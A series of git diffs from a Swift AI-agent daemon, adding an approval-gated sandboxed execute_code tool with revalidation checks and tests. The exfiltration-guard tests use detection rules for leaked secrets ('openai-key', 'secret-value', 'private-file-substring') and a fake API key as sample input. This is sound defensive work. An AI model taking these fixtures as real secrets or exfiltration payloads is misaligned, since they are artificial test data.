-      let (nextTotal, overflow) = recordedTotalBytes.addingReportingOverflow(record.bytes)
-      guard overflow == false, nextTotal <= Self.maxStagedTotalBytes else {
+      guard let nextTotal = Self.totalWithinCap(adding: record.bytes, to: recordedTotalBytes) else {
         return .failure("The recorded staged total exceeds the approved cap; nothing ran.")
       }
       recordedTotalBytes = nextTotal
@@ -575,20 +565,19 @@ private extension ExecuteCodeTool {
       guard data.count == record.bytes, SHA256Digest.hex(data) == record.sha256 else {
         return .failure("A staged file no longer matches its approved bytes; nothing ran.")
       }
-      let (nextTotal, overflow) = totalBytes.addingReportingOverflow(data.count)
-      guard overflow == false, nextTotal <= Self.maxStagedTotalBytes else {
+      guard let nextTotal = Self.totalWithinCap(adding: data.count, to: totalBytes) else {
         return .failure("Staged files exceed the approved total cap; nothing ran.")
       }
       totalBytes = nextTotal
 
-      let basename = (record.path as NSString).lastPathComponent
-      let normalized = Self.normalizedBasename(basename)
-      guard normalized.hasPrefix(".clawd-entrypoint.") == false,
-        normalizedNames.insert(normalized).inserted
-      else {
+      let basename: String
+      switch Self.validateBasename(of: record.path, claimed: &normalizedNames) {
+      case .reservedNamespace, .duplicate:
         return .failure(
           "The staged basename set no longer satisfies the approved layout; nothing ran."
         )
+      case .accepted(let accepted):
+        basename = accepted
       }
 
       loaded.append(

--- a/Sources/ClawTools/Tools/ExecuteCodeTool.swift
+++ b/Sources/ClawTools/Tools/ExecuteCodeTool.swift
@@ -123,7 +123,7 @@ public struct ExecuteCodeTool: Tool {
         PreparedToolAction(
           canonicalTarget: target,
           canonicalArgsJSON: canonicalArgsJSON,
-          presentation: preliminaryPresentation(raw: raw, recorded: recorded),
+          presentation: approvalPresentation(raw: raw, recorded: recorded),
           guardTexts: [raw.code] + loaded.map(\.guardText),
           canExfiltrate: network
         )
@@ -345,13 +345,32 @@ private extension ExecuteCodeTool {
     return json
   }
 
-  func preliminaryPresentation(
+  func approvalPresentation(
     raw: RawArguments,
     recorded: RecordedArguments
   ) -> ToolApprovalPresentation {
-    ToolApprovalPresentation(
-      blastRadius: "run \(recorded.language.rawValue) · egress: \(recorded.network ? "yes" : "no")",
-      contentPreview: redactor.redact(raw.code),
+    let codeBytes = raw.code.utf8.count
+    let totalBytes = recorded.stage.reduce(0) { partial, stage in
+      partial + stage.bytes
+    }
+    let stagedSummary =
+      recorded.stage.isEmpty
+      ? "Staged inputs: none"
+      : (["Staged inputs:"]
+        + recorded.stage.map { stage in
+          "- \(stage.path) | \(stage.realpath) | \(stage.bytes) B | \(stage.sha256.prefix(16))"
+        }).joined(separator: "\n")
+    let preview = """
+      ```\(recorded.language.rawValue)
+      \(redactor.redact(raw.code))
+      ```
+      \(stagedSummary)
+      """
+
+    return ToolApprovalPresentation(
+      blastRadius:
+        "run \(recorded.language.rawValue) · egress: \(recorded.network ? "yes" : "no") · \(settings.cpus) CPU / \(settings.memoryMiB) MiB · code \(codeBytes) B · \(recorded.stage.count) staged file(s), \(totalBytes) B",
+      contentPreview: preview,
       warnings: recorded.network
         ? ["network egress is enabled — this run can send data out"] : []
     )

--- a/Sources/ClawTools/Tools/ExecuteCodeTool.swift
+++ b/Sources/ClawTools/Tools/ExecuteCodeTool.swift
@@ -90,11 +90,11 @@ public struct ExecuteCodeTool: Tool {
       return .refused(reason: "The script exceeds the 16 KiB code cap.")
     }
 
-    let paths = raw.stage ?? []
+    let paths = raw.stage
     guard paths.count <= Self.maxStagedFiles else {
       return .refused(reason: "execute_code stages at most 16 files.")
     }
-    let network = raw.network ?? false
+    let network = raw.network
     guard network == false || settings.allowEgress else {
       return .refused(reason: "Networked code execution is disabled by configuration.")
     }
@@ -193,11 +193,26 @@ public struct ExecuteCodeTool: Tool {
 // MARK: - Argument Values
 
 private extension ExecuteCodeTool {
-  struct RawArguments: Codable {
+  struct RawArguments: Decodable {
     let language: String
     let code: String
-    let stage: [String]?
-    let network: Bool?
+    let stage: [String]
+    let network: Bool
+
+    init(from decoder: any Decoder) throws {
+      let container = try decoder.container(keyedBy: CodingKeys.self)
+      language = try container.decode(String.self, forKey: .language)
+      code = try container.decode(String.self, forKey: .code)
+      stage = try container.decodeIfPresent([String].self, forKey: .stage) ?? []
+      network = try container.decodeIfPresent(Bool.self, forKey: .network) ?? false
+    }
+
+    private enum CodingKeys: String, CodingKey {
+      case language
+      case code
+      case stage
+      case network
+    }
   }
 
   struct RecordedStage: Codable, Equatable {

--- a/Sources/ClawTools/Tools/ExecuteCodeTool.swift
+++ b/Sources/ClawTools/Tools/ExecuteCodeTool.swift
@@ -132,12 +132,61 @@ public struct ExecuteCodeTool: Tool {
   }
 
   public func execute(arguments: JSONValue, canonicalTarget: String?) async -> ToolPayload {
-    ToolPayload(
-      content:
-        "The recorded code action is not executable until its approval binding is revalidated.",
-      status: .error,
-      ingestedUntrusted: false
+    guard let approvedTarget = canonicalTarget else {
+      return errorPayload("execute_code was dispatched without its approved target.")
+    }
+    guard let recorded = Self.decode(RecordedArguments.self, from: arguments) else {
+      return errorPayload("The recorded code action is unreadable; nothing ran.")
+    }
+    guard let canonicalArgsJSON = Self.canonicalJSON(recorded) else {
+      return errorPayload("The recorded code action cannot be re-encoded safely; nothing ran.")
+    }
+    let expectedTarget =
+      "code_exec:\(recorded.language.rawValue):"
+      + String(SHA256Digest.hex(Data(canonicalArgsJSON.utf8)).prefix(16))
+    guard expectedTarget == approvedTarget else {
+      return errorPayload(
+        "The recorded code action no longer matches its approved target; nothing ran."
+      )
+    }
+    guard recorded.code.utf8.count <= Self.maxCodeBytes else {
+      return errorPayload("The recorded script exceeds the approved code cap; nothing ran.")
+    }
+    guard recorded.network == false || settings.allowEgress else {
+      return errorPayload("Networked execution is no longer enabled; nothing ran.")
+    }
+
+    let loaded: [LoadedStage]
+    switch reloadRecordedStages(recorded.stage) {
+    case .failure(let reason):
+      return errorPayload(reason)
+    case .success(let stages):
+      loaded = stages
+    }
+    let privateData = loaded.contains { stage in
+      isPrivate(realpath: stage.record.realpath)
+    }
+    guard privateData == recorded.readsPrivateData else {
+      return errorPayload(
+        "The staged private-data classification changed after approval; nothing ran."
+      )
+    }
+
+    let entrypoint = StagedFile(
+      name: recorded.language == .python ? ".clawd-entrypoint.py" : ".clawd-entrypoint.sh",
+      bytes: Data(recorded.code.utf8),
+      mode: .readExecute
     )
+    let request = ExecutionRequest(
+      language: recorded.language,
+      entrypoint: entrypoint,
+      inputs: loaded.map { stage in
+        StagedFile(name: stage.basename, bytes: stage.bytes, mode: .readOnly)
+      },
+      network: recorded.network,
+      timeout: settings.timeout
+    )
+    return map(result: await backend.run(request), readsPrivateData: recorded.readsPrivateData)
   }
 }
 
@@ -373,6 +422,157 @@ private extension ExecuteCodeTool {
       contentPreview: preview,
       warnings: recorded.network
         ? ["network egress is enabled — this run can send data out"] : []
+    )
+  }
+}
+
+// MARK: - Resume Revalidation
+
+private extension ExecuteCodeTool {
+  func reloadRecordedStages(_ records: [RecordedStage]) -> StageLoadResult {
+    guard records.count <= Self.maxStagedFiles else {
+      return .failure("The recorded stage count exceeds the approved cap; nothing ran.")
+    }
+
+    var recordedTotalBytes = 0
+    for record in records {
+      guard record.bytes >= 0, record.bytes <= Self.maxStagedFileBytes else {
+        return .failure("A recorded staged-file size exceeds the approved cap; nothing ran.")
+      }
+      let (nextTotal, overflow) = recordedTotalBytes.addingReportingOverflow(record.bytes)
+      guard overflow == false, nextTotal <= Self.maxStagedTotalBytes else {
+        return .failure("The recorded staged total exceeds the approved cap; nothing ran.")
+      }
+      recordedTotalBytes = nextTotal
+    }
+
+    var loaded: [LoadedStage] = []
+    var normalizedNames = Set<String>()
+    var totalBytes = 0
+
+    for record in records {
+      let liveRealpath: String
+      switch WorkspacePathContainment.resolveExisting(
+        path: record.path,
+        root: workspaceRoot.path
+      ) {
+      case .refused:
+        return .failure("A staged path no longer resolves to its approved target; nothing ran.")
+      case .resolved(let resolved):
+        liveRealpath = resolved
+      }
+      guard liveRealpath == record.realpath else {
+        return .failure("A staged path no longer resolves to its approved target; nothing ran.")
+      }
+
+      let attributes: [FileAttributeKey: Any]
+      do {
+        attributes = try FileManager.default.attributesOfItem(atPath: liveRealpath)
+      } catch {
+        return .failure("A staged file became unavailable after approval; nothing ran.")
+      }
+      guard attributes[.type] as? FileAttributeType == .typeRegular,
+        let size = attributes[.size] as? NSNumber,
+        size.intValue == record.bytes,
+        size.intValue <= Self.maxStagedFileBytes
+      else {
+        return .failure("A staged file no longer has its approved size and type; nothing ran.")
+      }
+
+      let data: Data
+      do {
+        guard
+          let bounded = try Self.readBoundedFile(
+            atPath: liveRealpath,
+            maxBytes: Self.maxStagedFileBytes
+          )
+        else {
+          return .failure("A staged file grew past its approved cap; nothing ran.")
+        }
+        data = bounded
+      } catch {
+        return .failure("A staged file became unreadable after approval; nothing ran.")
+      }
+      guard data.count == record.bytes, SHA256Digest.hex(data) == record.sha256 else {
+        return .failure("A staged file no longer matches its approved bytes; nothing ran.")
+      }
+      let (nextTotal, overflow) = totalBytes.addingReportingOverflow(data.count)
+      guard overflow == false, nextTotal <= Self.maxStagedTotalBytes else {
+        return .failure("Staged files exceed the approved total cap; nothing ran.")
+      }
+      totalBytes = nextTotal
+
+      let basename = (record.path as NSString).lastPathComponent
+      let normalized = Self.normalizedBasename(basename)
+      guard normalized.hasPrefix(".clawd-entrypoint.") == false,
+        normalizedNames.insert(normalized).inserted
+      else {
+        return .failure(
+          "The staged basename set no longer satisfies the approved layout; nothing ran."
+        )
+      }
+
+      loaded.append(
+        LoadedStage(
+          record: record,
+          basename: basename,
+          bytes: data
+        )
+      )
+    }
+
+    return .success(loaded)
+  }
+}
+
+// MARK: - Result Mapping
+
+private extension ExecuteCodeTool {
+  static let timeoutCopy = "The sandbox exceeded its execution timeout and was killed."
+  static let cancellationCopy = "The sandbox execution was cancelled."
+  static let memoryCapHint = "The run may have hit its memory cap."
+
+  func map(result: ExecutionResult, readsPrivateData: Bool) -> ToolPayload {
+    switch result.terminationReason {
+    case .exited(let code):
+      let stdout = redactor.redact(result.stdout)
+      let stderr = redactor.redact(result.stderr)
+      var content = """
+        exit \(code)
+        --- stdout ---
+        \(stdout)
+        --- stderr ---
+        \(stderr)
+        """
+      if code == 137 {
+        content += "\n" + Self.memoryCapHint
+      }
+      if result.truncatedRawBytes {
+        content += "\n" + Self.rawOutputTruncationNotice
+      }
+      return ToolPayload(
+        content: ToolOutputCap.cap(content),
+        status: .ok,
+        ingestedUntrusted: true,
+        readPrivateData: readsPrivateData
+      )
+    case .timedOutKilled:
+      return errorPayload(Self.timeoutCopy)
+    case .cancelled:
+      return errorPayload(Self.cancellationCopy)
+    case .startFailed(let reason):
+      return errorPayload("The sandbox could not start: \(reason)")
+    case .unavailable(let reason):
+      return errorPayload("The sandbox is unavailable: \(reason)")
+    }
+  }
+
+  func errorPayload(_ reason: String) -> ToolPayload {
+    ToolPayload(
+      content: redactor.redact(reason),
+      status: .error,
+      ingestedUntrusted: false,
+      readPrivateData: false
     )
   }
 }

--- a/Sources/clawd/Composition/DaemonBuilder+Intake.swift
+++ b/Sources/clawd/Composition/DaemonBuilder+Intake.swift
@@ -102,12 +102,14 @@ extension DaemonBuilder {
     workspace: FileSystemWorkspace
   ) -> String {
     PolicyFingerprint.staticSubhash(
-      tools: toolDispatcher.definitions,
-      llmBaseURL: config.llm.baseURL,
-      searchEndpointPresent: secrets.searchApiKey != nil,
-      workspaceRoot: workspace.root.path,
-      webFetchExemptCIDRs: config.webFetchExemptCIDRs,
-      exec: config.exec
+      inputs: PolicyFingerprint.StaticInputs(
+        tools: toolDispatcher.definitions,
+        llmBaseURL: config.llm.baseURL,
+        searchEndpointPresent: secrets.searchApiKey != nil,
+        workspaceRoot: workspace.root.path,
+        webFetchExemptCIDRs: config.webFetchExemptCIDRs,
+        exec: config.exec
+      )
     )
   }
 }

--- a/Sources/clawd/Composition/DaemonBuilder+Intake.swift
+++ b/Sources/clawd/Composition/DaemonBuilder+Intake.swift
@@ -87,7 +87,8 @@ extension DaemonBuilder {
       registry: ToolRegistry(tools: tools),
       gate: ToolPolicyGate(
         argGuard: ExfilArgGuard(secretValues: secretValues),
-        privateFileLoader: privateFileLoader
+        privateFileLoader: privateFileLoader,
+        execEnabled: config.exec.enabled
       )
     )
   }

--- a/Tests/ClawCoreTests/Domain/Policy/PolicyFingerprintTests.swift
+++ b/Tests/ClawCoreTests/Domain/Policy/PolicyFingerprintTests.swift
@@ -58,12 +58,14 @@ import Testing
     exec: ExecConfig = .disabledDefault
   ) -> String {
     PolicyFingerprint.staticSubhash(
-      tools: tools,
-      llmBaseURL: llm,
-      searchEndpointPresent: search,
-      workspaceRoot: root,
-      webFetchExemptCIDRs: exempt,
-      exec: exec
+      inputs: PolicyFingerprint.StaticInputs(
+        tools: tools,
+        llmBaseURL: llm,
+        searchEndpointPresent: search,
+        workspaceRoot: root,
+        webFetchExemptCIDRs: exempt,
+        exec: exec
+      )
     )
   }
 

--- a/Tests/ClawCoreTests/Domain/Tools/RiskLevelTests.swift
+++ b/Tests/ClawCoreTests/Domain/Tools/RiskLevelTests.swift
@@ -25,9 +25,10 @@ import Testing
     #expect(definition.riskLevel == .ask)
   }
 
-  @Test func askTierReasonHasTheStableRawValue() {
+  @Test func approvalReasonsHaveStableRawValues() {
     // given / when / then — the approvals.reason column vocabulary (spec §4.1)
     #expect(ApprovalReason.askTier.rawValue == "ask_tier")
     #expect(ApprovalReason.exfilTrifecta.rawValue == "exfil_trifecta")
+    #expect(ApprovalReason.codeExec.rawValue == "code_exec")
   }
 }

--- a/Tests/ClawCoreTests/Domain/Tools/ToolContractsTests.swift
+++ b/Tests/ClawCoreTests/Domain/Tools/ToolContractsTests.swift
@@ -3,6 +3,26 @@ import Testing
 
 @testable import ClawCore
 
+private struct DefaultPrepareTool: Tool {
+  var definition: ToolDefinition {
+    ToolDefinition(
+      name: "default_prepare",
+      description: "test",
+      parameters: .object(["type": .string("object")]),
+      egressClass: .none,
+      riskLevel: .safe
+    )
+  }
+
+  var timeout: Duration { .seconds(1) }
+
+  func canonicalTarget(arguments: JSONValue) -> CanonicalTargetResolution? { nil }
+
+  func execute(arguments: JSONValue, canonicalTarget: String?) async -> ToolPayload {
+    ToolPayload(content: "ok", status: .ok, ingestedUntrusted: false)
+  }
+}
+
 @Suite struct ToolContractsTests {
   @Test func jsonValueParsesObjectsAndAccessors() throws {
     // given
@@ -108,5 +128,43 @@ import Testing
     // then
     #expect(context.sessionTainted)
     #expect(context.approvalAlreadyPending == false)
+  }
+
+  @Test func preparedActionCarriesReplacementArgsAndPerCallEgress() {
+    // given
+    let presentation = ToolApprovalPresentation(
+      blastRadius: "run python",
+      contentPreview: "print('hello')",
+      warnings: []
+    )
+
+    // when
+    let action = PreparedToolAction(
+      canonicalTarget: "code_exec:python:0123456789abcdef",
+      canonicalArgsJSON: #"{"code":"print('hello')"}"#,
+      presentation: presentation,
+      guardTexts: ["print('hello')", "staged text"],
+      canExfiltrate: true
+    )
+
+    // then
+    #expect(action.canonicalTarget == "code_exec:python:0123456789abcdef")
+    #expect(action.canonicalArgsJSON == #"{"code":"print('hello')"}"#)
+    #expect(action.presentation == presentation)
+    #expect(action.guardTexts == ["print('hello')", "staged text"])
+    #expect(action.canExfiltrate)
+    #expect(PreparedActionResolution.prepared(action) == .prepared(action))
+    #expect(PreparedActionResolution.refused(reason: "no") == .refused(reason: "no"))
+  }
+
+  @Test func ordinaryToolsDefaultToNoPreparedAction() async {
+    // given
+    let tool = DefaultPrepareTool()
+
+    // when
+    let resolution = await tool.prepareAction(arguments: .object([:]))
+
+    // then
+    #expect(resolution == nil)
   }
 }

--- a/Tests/ClawDataTests/Stores/Bot/CommandStoreTests.swift
+++ b/Tests/ClawDataTests/Stores/Bot/CommandStoreTests.swift
@@ -163,6 +163,78 @@ import Testing
     #expect(audits.map { $0["run_id"] as Int64? } == [env.firstRunId, queuedRunId])
   }
 
+  @Test func newDetaintsBothStickyFlagsAndReportsSupersededRuns() throws {
+    // given — an active session carrying BOTH sticky flags plus one RUNNING and one queued run
+    let env = try fixture()
+    _ = try #require(
+      try env.runs.pickUp(runId: env.firstRunId, now: Date(timeIntervalSince1970: 10))
+    )
+    let queued = try env.sessions.claimAndPersistInbound(
+      inbound(updateId: 2, sessionKey: env.sessionKey, text: "queued")
+    )
+    let queuedRunId = try #require(queued.runId)
+    try env.queue.write { db in
+      try db.execute(
+        sql: "UPDATE sessions SET tainted = 1, has_private_data = 1 WHERE id = ?",
+        arguments: [env.sessionId]
+      )
+    }
+    let now = Date(timeIntervalSince1970: 200)
+
+    // when
+    let result = try env.commands.applyNew(updateId: 200, sessionKey: env.sessionKey, now: now)
+
+    // then — supersede AND both-flag detaint are observed jointly after the single /new commit
+    #expect(result.supersededRunIds == [env.firstRunId, queuedRunId])
+    let states = try runStates(env.queue)
+    #expect(states[env.firstRunId] == RunState.superseded.rawValue)
+    #expect(states[queuedRunId] == RunState.superseded.rawValue)
+    let flags = try sessionFlags(env.queue, sessionId: env.sessionId)
+    #expect(flags.tainted == false)
+    #expect(flags.hasPrivateData == false)
+  }
+
+  @Test func newSupersedeAndDetaintCommitTogether() throws {
+    // given — active runs and both sticky flags set, with a store that throws AFTER the in-txn
+    // supersede+detaint so we can observe whether they persist independently of a later failure
+    let env = try fixture()
+    _ = try #require(
+      try env.runs.pickUp(runId: env.firstRunId, now: Date(timeIntervalSince1970: 10))
+    )
+    let queued = try env.sessions.claimAndPersistInbound(
+      inbound(updateId: 2, sessionKey: env.sessionKey, text: "queued")
+    )
+    let queuedRunId = try #require(queued.runId)
+    try env.queue.write { db in
+      try db.execute(
+        sql: "UPDATE sessions SET tainted = 1, has_private_data = 1 WHERE id = ?",
+        arguments: [env.sessionId]
+      )
+    }
+    let statesBefore = try runStates(env.queue)
+    let crashingStore = CommandStoreGRDB(
+      writer: env.queue,
+      afterSupersedeAndDetaintForTesting: { throw InjectedCrash() }
+    )
+    let now = Date(timeIntervalSince1970: 500)
+
+    // when — the post-detaint throw surfaces classified at the seam, never as its raw type
+    #expect(throws: StoreError.self) {
+      try crashingStore.applyNew(updateId: 500, sessionKey: env.sessionKey, now: now)
+    }
+
+    // then — the whole transaction rolls back: supersede and detaint commit together or not at all,
+    // so a future split into two transactions (leaving supersede persisted) would break this
+    #expect(try processedCount(env.queue, updateId: 500) == 0)
+    let statesAfter = try runStates(env.queue)
+    #expect(statesAfter == statesBefore)
+    #expect(statesAfter[env.firstRunId] != RunState.superseded.rawValue)
+    #expect(statesAfter[queuedRunId] != RunState.superseded.rawValue)
+    let flags = try sessionFlags(env.queue, sessionId: env.sessionId)
+    #expect(flags.tainted == true)
+    #expect(flags.hasPrivateData == true)
+  }
+
   @Test func duplicateCommandDoesNotRepeatEffects() throws {
     // given
     let env = try fixture()
@@ -220,6 +292,22 @@ import Testing
         uniqueKeysWithValues: rows.map { row in (row["id"] as Int64, row["state"] as String) }
       )
     }
+  }
+
+  private func sessionFlags(
+    _ queue: DatabaseQueue,
+    sessionId: Int64
+  ) throws -> (tainted: Bool, hasPrivateData: Bool) {
+    let row = try #require(
+      try queue.read { db in
+        try Row.fetchOne(
+          db,
+          sql: "SELECT tainted, has_private_data FROM sessions WHERE id = ?",
+          arguments: [sessionId]
+        )
+      }
+    )
+    return (tainted: row["tainted"], hasPrivateData: row["has_private_data"])
   }
 
   private func processedCount(_ queue: DatabaseQueue, updateId: Int64) throws -> Int {

--- a/Tests/ClawGatewayTests/Acceptance/SC3Harness.swift
+++ b/Tests/ClawGatewayTests/Acceptance/SC3Harness.swift
@@ -145,6 +145,7 @@ func makeSC3Harness(
   workspaceRoot: URL? = nil,
   coordinator: ApprovalCoordinator = ApprovalCoordinator(),
   extraTools: [any Tool] = [],
+  execEnabled: Bool = false,
   dispatcherOverride: (any ToolDispatching)? = nil
 ) throws -> SC3Harness {
   let fileManager = FileManager.default
@@ -206,7 +207,8 @@ func makeSC3Harness(
     registry: ToolRegistry(tools: tools),
     gate: ToolPolicyGate(
       argGuard: ExfilArgGuard(secretValues: secretValues),
-      privateFileLoader: privateFileLoader
+      privateFileLoader: privateFileLoader,
+      execEnabled: execEnabled
     )
   )
 

--- a/Tests/ClawGatewayTests/Acceptance/SC7Harness.swift
+++ b/Tests/ClawGatewayTests/Acceptance/SC7Harness.swift
@@ -203,7 +203,8 @@ func makeSC7Harness(
     registry: ToolRegistry(tools: tools),
     gate: ToolPolicyGate(
       argGuard: ExfilArgGuard(secretValues: secretValues),
-      privateFileLoader: privateFileLoader
+      privateFileLoader: privateFileLoader,
+      execEnabled: false
     )
   )
 

--- a/Tests/ClawGatewayTests/Response/ToolApprovalPromptTests.swift
+++ b/Tests/ClawGatewayTests/Response/ToolApprovalPromptTests.swift
@@ -254,6 +254,36 @@ import Testing
     #expect(chunks.last?.replyMarkup != nil)
   }
 
+  @Test func fullCodeConsentSurvivesPromptChunking() {
+    // given
+    let code = String(repeating: "print('x')\n", count: 4_000)
+    let input = ToolApprovalPrompt.Input(
+      recorded: recorded(
+        tool: "execute_code",
+        target: "code_exec:python:0123456789abcdef",
+        reason: .codeExec,
+        blastRadius: "run python · egress: no · 4 CPU / 1024 MiB",
+        preview: "```python\n\(code)```"
+      ),
+      taintBanner: true,
+      privilegedFileBanner: false
+    )
+
+    // when
+    let chunks = ToolApprovalPrompt.chunks(for: input, chatId: 7, nonce: "nonce")
+
+    // then
+    #expect(chunks.count > 1)
+    #expect(chunks.map(\.payload).joined() == ToolApprovalPrompt.text(for: input))
+    #expect(chunks.map(\.payload).joined().contains(code))
+    #expect(
+      chunks.dropLast().allSatisfy { chunk in
+        chunk.replyMarkup == nil
+      }
+    )
+    #expect(chunks.last?.replyMarkup != nil)
+  }
+
   @Test func richPromptRendersForEveryApprovalReason() {
     // given — the renderer is exhaustive over ApprovalReason; this pins that both reasons produce
     // owner-facing copy carrying the target at runtime (the compile-time guarantee is the switch)

--- a/Tests/ClawGatewayTests/Response/ToolApprovalPromptTests.swift
+++ b/Tests/ClawGatewayTests/Response/ToolApprovalPromptTests.swift
@@ -27,6 +27,28 @@ import Testing
     )
   }
 
+  @Test func codeExecutionReasonGetsDedicatedOwnerCopy() {
+    // given
+    let input = ToolApprovalPrompt.Input(
+      recorded: recorded(
+        tool: "execute_code",
+        target: "code_exec:python:0123456789abcdef",
+        reason: .codeExec,
+        blastRadius: "run python · egress: no · 4 CPU / 1024 MiB"
+      ),
+      taintBanner: false,
+      privilegedFileBanner: false
+    )
+
+    // when
+    let text = ToolApprovalPrompt.text(for: input)
+
+    // then
+    #expect(text.contains("execute_code"))
+    #expect(text.contains("disposable sandbox"))
+    #expect(text.contains("code_exec:python:0123456789abcdef"))
+  }
+
   @Test func richPromptCarriesToolFullTargetAndBlastRadius() {
     // given
     let input = ToolApprovalPrompt.Input(
@@ -235,7 +257,7 @@ import Testing
   @Test func richPromptRendersForEveryApprovalReason() {
     // given — the renderer is exhaustive over ApprovalReason; this pins that both reasons produce
     // owner-facing copy carrying the target at runtime (the compile-time guarantee is the switch)
-    for reason in [ApprovalReason.askTier, ApprovalReason.exfilTrifecta] {
+    for reason in [ApprovalReason.askTier, .exfilTrifecta, .codeExec] {
       let input = ToolApprovalPrompt.Input(
         recorded: recorded(
           tool: "file_write",

--- a/Tests/ClawToolsTests/Policy/ExfilArgGuardTests.swift
+++ b/Tests/ClawToolsTests/Policy/ExfilArgGuardTests.swift
@@ -173,4 +173,70 @@ import Testing
     #expect(verdict.redactedArgs.contains("first-secret-aaa") == false)
     #expect(verdict.redactedArgs.contains("second-secret-bbb") == false)
   }
+
+  @Test func textEvaluationUsesTheSameUnconditionalRulesAsArgumentJSON() {
+    // given
+    let guardrail = ExfilArgGuard(secretValues: ["loaded-secret-value"])
+
+    // when
+    let exact = guardrail.evaluate(text: "prefix loaded-secret-value suffix")
+    let shaped = guardrail.evaluate(text: "token sk-abcdefghijklmnop1234")
+
+    // then
+    #expect(exact.blockedRule == "secret-value")
+    #expect(exact.redactedArgs.contains("loaded-secret-value") == false)
+    #expect(shaped.blockedRule == "openai-key")
+    #expect(shaped.redactedArgs.contains("sk-abcdefghijklmnop1234") == false)
+  }
+
+  @Test func onePrivateIndexScansMultipleTextsAtTheSixteenGraphemeBoundary() {
+    // given
+    let guardrail = ExfilArgGuard(secretValues: [])
+    let index = ExfilArgGuard.PrivateTextIndex(
+      texts: ["Operation Nightjar Falcon belongs to the owner."]
+    )
+
+    // when
+    let first = guardrail.evaluateConditional(
+      text: "send Operation Nightj now",
+      index: index
+    )
+    let second = guardrail.evaluateConditional(
+      text: "Operation Night",
+      index: index
+    )
+
+    // then
+    #expect(first.blockedRule == "private-file-substring")
+    #expect(second.blockedRule == nil)
+  }
+
+  @Test func privateIndexNormalizesBothSourcesAndCandidatesToNFC() {
+    // given
+    let guardrail = ExfilArgGuard(secretValues: [])
+    let composed = "Résumé confidentiel"
+    let decomposed = composed.decomposedStringWithCanonicalMapping
+    let index = ExfilArgGuard.PrivateTextIndex(texts: [composed])
+
+    // when
+    let verdict = guardrail.evaluateConditional(text: decomposed, index: index)
+
+    // then
+    #expect(verdict.blockedRule == "private-file-substring")
+  }
+
+  @Test func maximumStagedPayloadUsesTheBoundedTextPath() {
+    // given — functional max-bound case; no stopwatch assertion
+    let guardrail = ExfilArgGuard(secretValues: [])
+    let index = ExfilArgGuard.PrivateTextIndex(texts: ["private marker only in source"])
+    let text = String(repeating: "a", count: 4 * 1024 * 1024)
+
+    // when
+    let unconditional = guardrail.evaluate(text: text)
+    let conditional = guardrail.evaluateConditional(text: text, index: index)
+
+    // then
+    #expect(unconditional.blockedRule == nil)
+    #expect(conditional.blockedRule == nil)
+  }
 }

--- a/Tests/ClawToolsTests/Policy/ToolPolicyGateTests.swift
+++ b/Tests/ClawToolsTests/Policy/ToolPolicyGateTests.swift
@@ -123,6 +123,44 @@ private struct PreparedDangerousTool: Tool {
   }
 }
 
+/// Counts how many times the gate asked the tool to prepare, so a test can prove that an occupied
+/// approval slot short-circuits before the expensive staging/scan preparation runs.
+private actor PrepareCallProbe {
+  private(set) var count = 0
+
+  func mark() {
+    count += 1
+  }
+}
+
+private struct ProbedDangerousTool: Tool {
+  let resolution: PreparedActionResolution?
+  let probe: PrepareCallProbe
+
+  var definition: ToolDefinition {
+    ToolDefinition(
+      name: "execute_code",
+      description: "test dangerous tool",
+      parameters: .object(["type": .string("object")]),
+      egressClass: .none,
+      riskLevel: .dangerous
+    )
+  }
+
+  var timeout: Duration { .seconds(30) }
+
+  func canonicalTarget(arguments: JSONValue) -> CanonicalTargetResolution? { nil }
+
+  func prepareAction(arguments: JSONValue) async -> PreparedActionResolution? {
+    await probe.mark()
+    return resolution
+  }
+
+  func execute(arguments: JSONValue, canonicalTarget: String?) async -> ToolPayload {
+    ToolPayload(content: "must not execute in the gate", status: .error, ingestedUntrusted: false)
+  }
+}
+
 @Suite struct ToolPolicyGateTests {
   private static let memoryText = "The owner's private project is called Operation Nightjar Falcon."
 
@@ -714,6 +752,49 @@ private struct PreparedDangerousTool: Tool {
       return
     }
     #expect(payload.status == .blockedPendingApproval)
+  }
+
+  @Test func pendingApprovalBlocksBeforeAnyStagingOrScan() async {
+    // given
+    let probe = PrepareCallProbe()
+    let tool = ProbedDangerousTool(resolution: .prepared(dangerousAction()), probe: probe)
+
+    // when — an approval already holds the single slot
+    let verdict = await makeGate(execEnabled: true).evaluate(
+      call: ToolCall(id: "e1", name: "execute_code", argumentsJSON: "{}"),
+      tool: tool,
+      context: makeContext(approvalPending: true)
+    )
+
+    // then — blocked without ever asking the tool to stage/scan its inputs
+    guard case .block(let payload, _) = verdict else {
+      Issue.record("expected pending-approval block, got \(verdict)")
+      return
+    }
+    #expect(payload.status == .blockedPendingApproval)
+    let prepareCalls = await probe.count
+    #expect(prepareCalls == 0)
+  }
+
+  @Test func openApprovalSlotStillPreparesTheDangerousAction() async {
+    // given — the control: with the slot open, preparation must run so the action can park
+    let probe = PrepareCallProbe()
+    let tool = ProbedDangerousTool(resolution: .prepared(dangerousAction()), probe: probe)
+
+    // when
+    let verdict = await makeGate(execEnabled: true).evaluate(
+      call: ToolCall(id: "e1", name: "execute_code", argumentsJSON: "{}"),
+      tool: tool,
+      context: makeContext()
+    )
+
+    // then
+    guard case .requireApproval = verdict else {
+      Issue.record("expected dangerous approval, got \(verdict)")
+      return
+    }
+    let prepareCalls = await probe.count
+    #expect(prepareCalls == 1)
   }
 }
 

--- a/Tests/ClawToolsTests/Policy/ToolPolicyGateTests.swift
+++ b/Tests/ClawToolsTests/Policy/ToolPolicyGateTests.swift
@@ -94,15 +94,66 @@ struct WriteLikeTool: Tool {
   }
 }
 
+/// A scripted dangerous-tier stand-in modeling `execute_code`: egress `.none`, risk `.dangerous`.
+/// Its `prepareAction` returns the injected resolution so the gate's dangerous arm can be driven
+/// over prepared canonical values without any sandbox plumbing.
+private struct PreparedDangerousTool: Tool {
+  let resolution: PreparedActionResolution?
+
+  var definition: ToolDefinition {
+    ToolDefinition(
+      name: "execute_code",
+      description: "test dangerous tool",
+      parameters: .object(["type": .string("object")]),
+      egressClass: .none,
+      riskLevel: .dangerous
+    )
+  }
+
+  var timeout: Duration { .seconds(30) }
+
+  func canonicalTarget(arguments: JSONValue) -> CanonicalTargetResolution? { nil }
+
+  func prepareAction(arguments: JSONValue) async -> PreparedActionResolution? {
+    resolution
+  }
+
+  func execute(arguments: JSONValue, canonicalTarget: String?) async -> ToolPayload {
+    ToolPayload(content: "must not execute in the gate", status: .error, ingestedUntrusted: false)
+  }
+}
+
 @Suite struct ToolPolicyGateTests {
   private static let memoryText = "The owner's private project is called Operation Nightjar Falcon."
 
   private func makeGate(
